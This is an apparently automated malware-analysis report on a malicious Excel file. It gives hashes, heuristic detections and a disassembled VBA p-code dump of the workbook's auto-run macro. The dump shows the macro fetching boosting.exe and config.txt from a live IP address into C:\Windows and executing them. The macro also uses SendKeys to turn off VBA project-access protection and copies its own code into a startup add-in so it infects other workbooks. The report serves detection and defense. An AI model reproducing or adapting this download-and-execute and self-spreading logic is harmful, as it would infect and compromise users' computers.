Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 03dbbb783f1a26df…

MALICIOUS

Office (OLE) / .XLS

284.5 KB Created: 2009-06-18 12:15:15 Authoring application: Microsoft Excel First seen: 2026-06-28
MD5: 82573b34e7ccdba099230c56ceff9876 SHA-1: 6af4ef0d7fed5f368aa5b5407f6cd8201bb1bf38 SHA-256: 03dbbb783f1a26dfccf786fe0c5b6c923c0bed3cbc7d15e50ba1b6f7546601cc
224 Risk Score

Heuristics 7

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA project contains no executable statements info 1 related finding OLE_VBA_MACROS
    Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://45.78.21.150/boost/boosting.exe� In document text (OLE body)
    • http://45.78.21.150/boost/config.txt�In document text (OLE body)
    • http://45.78.21.150/boost/booIn macro / runtime command snippet
    • http://45.78.21.150/boost/boosting.exeIn document text (OLE body)
    • http://45.78.21.150/boost/config.txtIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12680 bytes
SHA-256: 6aed6f8999a97626046f1f6fed31a43621ab40f91b948df61e3397ad9a778dff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/3524ab4f8fff466f80dfeb75ab7af1a8.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 13349 bytes
' Line #0:
' 	FuncDefn (Function URLDownloadToFile(ByVal pCaller As Long) As Long)
' Line #1:
' 	FuncDefn (Function ShellExecute(ByVal hWnd As Long) As Long)
' Line #2:
' 	Dim (Private) 
' 	VarDefn (WithEvents) app 0x0000
' Line #3:
' Line #4:
' 	FuncDefn (Sub boosting())
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' 	OnError (Resume Next) 
' Line #7:
' 	SetStmt 
' 	LitStr 0x000D "Win32_Process"
' 	LitStr 0x000C "winmgmts:\\."
' 	ArgsLd GetObject 0x0001 
' 	ArgsMemLd InstancesOf 0x0001 
' 	Set pro 
' Line #8:
' 	LitDI2 0x0000 
' 	St boo 
' Line #9:
' 	StartForVariable 
' 	Ld ps 
' 	EndForVariable 
' 	Ld pro 
' 	ForEach 
' Line #10:
' 	Ld ps 
' 	MemLd Name 
' 	LitStr 0x000C "boosting.exe"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St boo 
' 	EndIf 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	Ld boo 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #13:
' 	ExitSub 
' Line #14:
' 	ElseBlock 
' Line #15:
' 	LitStr 0x0015 "ping www.163.com -n 1"
' 	LitDI2 0x0000 
' 	LitVarSpecial (True)
' 	LitStr 0x000D "Wscript.shell"
' 	ArgsLd CreateObject 0x0001 
' 	ArgsMemLd Run 0x0003 
' 	St oExec 
' Line #16:
' 	Ld oExec 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #17:
' 	LitDI2 0x0000 
' 	LitStr 0x0026 "http://45.78.21.150/boost/boosting.exe"
' 	LitStr 0x0017 "C:\Windows\boosting.exe"
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall URLDownloadToFile 0x0005 
' Line #18:
' 	LitDI2 0x0000 
' 	LitStr 0x0024 "http://45.78.21.150/boost/config.txt"
' 	LitStr 0x0015 "C:\Windows\config.txt"
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall URLDownloadToFile 0x0005 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	LitDI4 0x0000 0x0000 
' 	Ld vbNullString 
' 	LitStr 0x0017 "C:\Windows\boosting.exe"
' 	LitStr 0x0015 "C:\Windows\config.txt"
' 	Ld vbNullString 
' 	LitDI2 0x0000 
' 	ArgsCall ShellExecute 0x0006 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	EndSub 
' Line #23:
' 	FuncDefn (Sub runtimer())
' Line #24:
' 	Ld Now 
' 	LitStr 0x0008 "00:00:03"
' 	ArgsLd TimeValue 0x0001 
' 	Add 
' 	LitStr 0x0011 "thisworkbook.p2dd"
' 	Ld Application 
' 	ArgsMemCall OnTime 0x0002 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:
' 	FuncDefn (Sub p2dd())
' Line #28:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #29:
' 	OnError (Resume Next) 
' Line #30:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #31:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Eq 
' 	IfBlock 
' Line #32:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #33:
' 	LitStr 0x0010 "%(qtmstv){ENTER}"
' 	Ld Application 
' 	ArgsMemCall SendKeys 0x0001 
' Line #34:
' 	ArgsCall DoEvents 0x0000 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	Ld ActiveWorkbook 
' 	MemLd FileFormat 
' 	LitDI2 0x0034 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd FileFormat 
' 	LitDI2 0x0038 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #37:
' 	LitStr 0x0006 "update"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x000A 
' 	LitDI2 0x0001 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	LitVarSpecial (True)
' 	Eq 
' 	LitStr 0x000B "OfficeCheck"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x000A 
' 	LitDI2 0x0001 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	LitVarSpecial (True)
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #38:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St k 
' Line #39:
' 	LitDI2 0x0001 
' 	Ld k 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #40:
' 	EndIfBlock 
' Line #41:
' 	Dim 
' 	VarDefn WBstr
' 	VarDefn Wb
' Line #42:
' 	StartWithExpr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #43:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' 	QuoteRem 0x0019 0x000D ".CountOfLines"
' Line #44:
' 	Ld WBstr 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St WBstr 
' Line #45:
' 	StartForVariable 
' 	Next 
' Line #46:
' 	EndWith 
' Line #47:
' Line #48:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #49:
' 	LitDI2 0x0001 
' 	Ld WBstr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #50:
' 	LitDI2 0x0096 
' 	LitStr 0x0013 "Sub Workbook_Open()"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #51:
' 	LitDI2 0x0097 
' 	LitStr 0x0008 "Call d2p"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #52:
' 	LitDI2 0x0098 
' 	LitStr 0x000D "Call boosting"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #53:
' 	LitDI2 0x0099 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #54:
' 	EndIfBlock 
' Line #55:
' 	EndIfBlock 
' Line #56:
' 	EndSub 
' Line #57:
' Line #58:
' 	FuncDefn (Sub d2p())
' Line #59:
' 	Dim 
' 	VarDefn pth (As String)
' Line #60:
' 	Dim 
' 	VarDefn WBstr
' 	VarDefn Wb
' Line #61:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #62:
' 	OnError (Resume Next) 
' Line #63:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000D "\boosting.xls"
' 	Concat 
' 	St pth1 
' Line #64:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #65:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Eq 
' 	IfBlock 
' Line #66:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #67:
' 	LitStr 0x0010 "%(qtmstv){ENTER}"
' 	Ld Application 
' 	ArgsMemCall SendKeys 0x0001 
' Line #68:
' 	ArgsCall DoEvents 0x0000 
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	Ld pth1 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #71:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #72:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Ne 
' 	IfBlock 
' Line #73:
' 	Ld pth1 
' 	ParamNamed Filename 
' 	LitDI2 0x0012 
' 	ParamNamed FileFormat 
' 	Ld Workbooks 
' 	MemLd Add 
' 	ArgsMemCall SaveAs 0x0002 
' Line #74:
' 	QuoteRem 0x0000 0x0004 "Else"
' Line #75:
' 	QuoteRem 0x0004 0x000F "Workbooks.Close"
' Line #76:
' 	EndIfBlock 
' Line #77:
' 	SetStmt 
' 	Ld pth1 
' 	Ld Workbooks 
' 	ArgsMemLd Open 0x0001 
' 	Set Wb 
' Line #78:
' 	StartWithExpr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #79:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' 	QuoteRem 0x0019 0x0011 ".CountOfLines 100"
' Line #80:
' 	Ld WBstr 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St WBstr 
' Line #81:
' 	StartForVariable 
' 	Next 
' Line #82:
' 	EndWith 
' Line #83:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd Name 
' 	LitStr 0x000C "boosting.xls"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #84:
' 	LitDI2 0x0001 
' 	Ld WBstr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #85:
' 	LitDI2 0x0096 
' 	LitStr 0x0013 "Sub Workbook_Open()"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #86:
' 	LitDI2 0x0097 
' 	LitStr 0x0015 "Set App = Application"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #87:
' 	LitDI2 0x0098 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #88:
' 	LitDI2 0x0099 
' 	LitStr 0x0032 "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #89:
' 	LitDI2 0x009A 
' 	LitStr 0x000D "Call runtimer"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #90:
' 	LitDI2 0x009B 
' 	LitStr 0x000D "Call boosting"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #91:
' 	LitDI2 0x009C 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #92:
' 	EndIfBlock 
' Line #93:
' 	LitVarSpecial (True)
' 	Ld ActiveWorkbook 
' 	MemSt IsAddin 
' Line #94:
' 	Ld Wb 
' 	ArgsMemCall Save 0x0000 
' Line #95:
' 	Ld Wb 
' 	ArgsMemCall Close 0x0000 
' Line #96:
' 	EndIfBlock 
' Line #97:
' 	Ld pth1 
' 	Paren 
' 	Ld Workbooks 
' 	ArgsMemCall Open 0x0001 
' Line #98:
' 	EndSub 
' Line #99:
' Line #100:
' Line #101:
' 	FuncDefn (Sub Workbook_Open())
' Line #102:
' 	ArgsCall (Call) d2p 0x0000 
' Line #103:
' 	ArgsCall (Call) boosting 0x0000 
' Line #104:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet6 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet4 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet5 - 999 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.